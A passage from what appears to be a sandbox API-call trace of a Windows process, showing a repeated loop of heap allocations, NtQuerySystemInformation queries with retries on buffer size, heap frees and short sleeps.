0x295b5a8 [0247.921] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.922] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0247.922] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0247.922] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0247.922] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0247.922] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0247.923] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0247.923] Sleep (dwMilliseconds=0x110) [0247.938] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0247.938] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.939] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0247.939] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0247.939] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.939] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0247.939] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0247.939] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.940] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0247.940] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0247.940] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0247.941] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0247.941] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0247.941] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0247.941] Sleep (dwMilliseconds=0x110) [0247.955] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0247.955] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.955] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0247.955] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0247.955] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.956] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0247.956] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0247.956] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.957] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0247.957] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0247.957] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0247.957] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0247.957] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0247.958] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0247.958] Sleep (dwMilliseconds=0x110) [0247.969] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0247.969] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.970] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0247.970] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0247.970] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.971] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0247.971] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0247.971] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.971] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0247.971] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0247.971] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0247.972] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0247.972] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0247.973] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0247.973] Sleep (dwMilliseconds=0x110) [0247.981] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0247.981] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.982] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0247.982] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0247.982] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.983] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0247.983] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0247.983] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0247.984] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0247.984] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0247.984] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0247.985] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0247.985] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0247.986] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0247.986] Sleep (dwMilliseconds=0x110) [0248.001] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0248.001] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0248.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0248.003] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.004] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0248.004] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0248.004] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.005] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0248.005] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0248.005] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.005] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0248.005] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.006] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.006] Sleep (dwMilliseconds=0x110) [0248.016] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0248.016] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.017] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0248.017] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0248.017] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.018] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0248.018] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0248.018] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.019] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0248.019] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0248.019] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.020] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0248.020] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.021] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.021] Sleep (dwMilliseconds=0x110) [0248.030] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0248.030] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.031] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0248.031] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0248.031] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.031] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0248.031] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0248.032] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.032] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0248.032] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0248.032] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.033] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0248.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.033] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.033] Sleep (dwMilliseconds=0x110) [0248.046] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0248.046] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.047] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0248.047] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0248.047] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.048] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0248.048] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0248.048] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.049] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0248.049] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0248.049] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.050] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0248.050] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.050] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.050] Sleep (dwMilliseconds=0x110) [0248.064] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0248.064] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.065] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0248.065] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0248.065] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.066] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0248.066] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0248.066] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.066] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0248.067] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0248.067] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.067] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0248.067] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.068] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.068] Sleep (dwMilliseconds=0x110) [0248.079] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0248.079] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0248.080] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0248.080] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0248.081] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0248.081] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.081] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0248.081] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0248.081] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.082] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0248.082] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.083] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.083] Sleep (dwMilliseconds=0x110) [0248.095] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0248.095] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.096] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0248.096] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0248.096] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.096] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0248.096] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0248.096] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.097] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0248.097] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0248.097] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.098] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0248.098] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.099] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.099] Sleep (dwMilliseconds=0x110) [0248.106] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0248.106] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.107] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0248.111] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0248.111] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.111] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0248.111] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0248.111] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.112] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0248.112] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0248.112] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.113] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0248.113] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.113] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.113] Sleep (dwMilliseconds=0x110) [0248.127] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0248.127] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.128] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0248.128] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0248.128] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.129] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0248.129] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0248.129] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.130] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0248.130] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0248.130] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.130] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0248.130] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.131] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.131] Sleep (dwMilliseconds=0x110) [0248.142] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0248.142] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.143] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0248.143] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0248.143] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.143] HeapFree (in: 